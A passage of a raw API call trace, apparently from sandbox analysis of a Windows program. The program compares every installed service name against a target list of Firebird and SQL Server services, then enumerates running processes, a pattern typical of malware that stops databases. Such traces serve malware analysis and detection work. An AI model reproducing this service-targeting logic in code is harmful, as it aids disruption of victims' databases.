(lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0183.171] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0183.171] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0183.172] lstrlenW (lpString="ClickToRunSvc") returned 13 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0183.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0183.172] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0183.172] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0183.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0183.172] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0183.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0183.172] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0183.172] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0183.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0183.172] lstrlenW (lpString="CryptSvc") returned 8 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0183.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0183.172] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0183.172] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0183.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0183.172] lstrlenW (lpString="DcomLaunch") returned 10 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0183.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0183.172] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0183.172] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0183.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0183.172] lstrlenW (lpString="DeviceAssociationService") returned 24 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0183.172] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0183.172] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0183.172] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0183.172] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0183.172] lstrlenW (lpString="Dhcp") returned 4 [0183.172] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0183.173] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0183.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0183.173] lstrlenW (lpString="Dnscache") returned 8 [0183.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0183.173] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0183.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0183.173] lstrlenW (lpString="DPS") returned 3 [0183.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0183.173] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0183.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0183.173] lstrlenW (lpString="DusmSvc") returned 7 [0183.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0183.173] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0183.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0183.173] lstrlenW (lpString="EventLog") returned 8 [0183.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0183.173] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0183.173] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0183.173] lstrlenW (lpString="EventSystem") returned 11 [0183.173] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0183.173] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0183.173] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0183.174] lstrlenW (lpString="FontCache") returned 9 [0183.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0183.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0183.174] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0183.174] lstrlenW (lpString="gpsvc") returned 5 [0183.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0183.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0183.174] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0183.174] lstrlenW (lpString="iphlpsvc") returned 8 [0183.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0183.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0183.174] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0183.174] lstrlenW (lpString="KeyIso") returned 6 [0183.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0183.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0183.174] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0183.174] lstrlenW (lpString="LanmanServer") returned 12 [0183.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0183.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0183.174] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0183.174] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0183.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0183.174] lstrlenW (lpString="LanmanWorkstation") returned 17 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0183.175] lstrlenW (lpString="lfsvc") returned 5 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0183.175] lstrlenW (lpString="lmhosts") returned 7 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0183.175] lstrlenW (lpString="LSM") returned 3 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0183.175] lstrlenW (lpString="MpsSvc") returned 6 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0183.175] lstrlenW (lpString="NcbService") returned 10 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0183.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0183.175] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0183.175] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0183.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0183.175] lstrlenW (lpString="netprofm") returned 8 [0183.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0183.176] lstrlenW (lpString="NgcSvc") returned 6 [0183.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0183.176] lstrlenW (lpString="NlaSvc") returned 6 [0183.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0183.176] lstrlenW (lpString="nsi") returned 3 [0183.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0183.176] lstrlenW (lpString="PcaSvc") returned 6 [0183.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0183.176] lstrlenW (lpString="PlugPlay") returned 8 [0183.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0183.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0183.176] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0183.176] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0183.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0183.177] lstrlenW (lpString="Power") returned 5 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0183.177] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0183.177] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0183.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0183.177] lstrlenW (lpString="ProfSvc") returned 7 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0183.177] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0183.177] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0183.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0183.177] lstrlenW (lpString="RpcEptMapper") returned 12 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0183.177] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0183.177] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0183.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0183.177] lstrlenW (lpString="RpcSs") returned 5 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0183.177] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0183.177] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0183.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0183.177] lstrlenW (lpString="SamSs") returned 5 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0183.177] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0183.177] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0183.177] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0183.177] lstrlenW (lpString="Schedule") returned 8 [0183.177] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0183.177] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0183.178] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0183.178] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0183.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0183.178] lstrlenW (lpString="SecurityHealthService") returned 21 [0183.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0183.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0183.178] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0183.178] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0183.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0183.178] lstrlenW (lpString="SENS") returned 4 [0183.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0183.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0183.178] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0183.178] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0183.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0183.178] lstrlenW (lpString="ShellHWDetection") returned 16 [0183.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0183.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0183.178] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0183.178] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0183.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0183.178] lstrlenW (lpString="Spooler") returned 7 [0183.178] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0183.178] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0183.178] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0183.178] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0183.178] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0183.178] lstrlenW (lpString="StateRepository") returned 15 [0183.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0183.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0183.179] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0183.179] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0183.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0183.179] lstrlenW (lpString="SysMain") returned 7 [0183.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0183.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0183.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0183.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0183.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0183.179] lstrlenW (lpString="SystemEventsBroker") returned 18 [0183.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0183.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0183.179] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0183.179] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0183.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0183.179] lstrlenW (lpString="Themes") returned 6 [0183.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0183.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0183.179] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0183.179] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0183.179] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0183.179] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0183.179] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0183.179] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0183.179] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0183.179] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0183.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x772a00 | out: hHeap=0x680000) returned 1 [0183.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4 [0183.183] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.183] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.184] lstrlenW (lpString="System") returned 6 [0183.184] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.184] lstrlenW (lpString="smss.exe") returned 8 [0183.185] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.185] lstrlenW (lpString="csrss.exe") returned 9 [0184.038] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.039] lstrlenW (lpString="wininit.exe") returned 11 [0184.040] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.040] lstrlenW (lpString="csrss.exe") returned 9 [0184.040] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.041] lstrlenW (lpString="winlogon.exe") returned 12 [0184.041] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.042] lstrlenW (lpString="services.exe") returned 12 [0184.042] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.043] lstrlenW (lpString="lsass.exe") returned 9 [0184.043] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0184.044] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0184.044] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0184.044] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0184.044] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.046] lstrlenW (lpString="svchost.exe") returned 11 [0184.046] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.046] lstrlenW (lpString="svchost.exe") returned 11 [0184.046] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.047] lstrlenW (lpString="dwm.exe") returned 7 [0184.047] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.048] lstrlenW (lpString="svchost.exe") returned 11 [0184.048] Process32NextW (in: hSnapshot=0x3a4, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 